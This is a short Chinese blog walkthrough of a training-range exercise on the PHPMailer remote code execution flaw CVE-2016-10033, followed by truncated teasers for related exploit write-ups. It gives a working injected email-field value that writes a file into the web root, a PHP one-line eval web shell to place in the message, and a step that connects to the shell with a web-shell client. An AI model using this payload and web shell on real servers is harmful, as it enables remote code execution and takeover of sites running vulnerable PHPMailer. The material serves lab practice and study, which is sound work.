首先我们需要了解 CVE-2016-10033:PHPMailer远程代码执行漏洞的分析
https://www.anquanke.com/post/id/85295
1、了解Burp suite中Spider模块使用方法;
2、了解PHPMailer远程命令执行漏洞利用方法;
1、通过Burp Suite中spider模块扫描网站目录结构,如图1所示。
图1 扫描网站结构
2、发现mail.php页面。我们打开查看,如图2所示。
图2 打开mail.php
3、插入恶意代码
(1)在name处随便输入
比如aaa
(2)在email处输入
"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com
(3)在message处输入一句话木马
<?php @eval($_POST[a]);?>
4、点击Send email发送。最后通过菜刀链接,key在根目录。
首先我们需要了解 CVE-2016-10033:PHPMailer远程代码执行漏洞的分析https://www.a...
PHPMailer远程命令执行漏洞复现 一、漏洞简介 PHPMailer是PHP电子邮件创建及传输类,用于多个开...
靶场地址:https://www.mozhe.cn/bug/detail/NCtVbElOSmRDVFdmS1Ey...
一、 实验目标 理解Samba远程命令执行漏洞的原理 掌握怎么利用Samba远程命令执行漏洞 链接:https:/...
靶场地址:https://www.mozhe.cn/bug/detail/Zis0bC9SUnlJZEtBdlZk...
1. 远程命令执行漏洞 1. 利用系统函数实现远程命令执行 在PHP下,允许命令执行的函数有: eval() as...
ThinkPHP < 5.0.2以及5.1.31 远程命令执行 漏洞利用
分别写远程系统命令执行与代码执行漏洞原理 远程命令执行原理:应用系统从设计上需要给用户提供指定的远程命令操作的接口...
分析 漏洞编号: CVE-2014-6271 漏洞名称: Linux Bash远程可执行漏洞 漏洞影响范围: 所有...
Electron WebPreferences 远程命令执行漏洞(CVE-2018-15685) 1.漏洞影响版本...
本文标题:墨者学院 - PHPMailer远程命令执行漏洞溯源
本文链接:https://www.haomeiwen.com/subject/rxuaqqtx.html
网友评论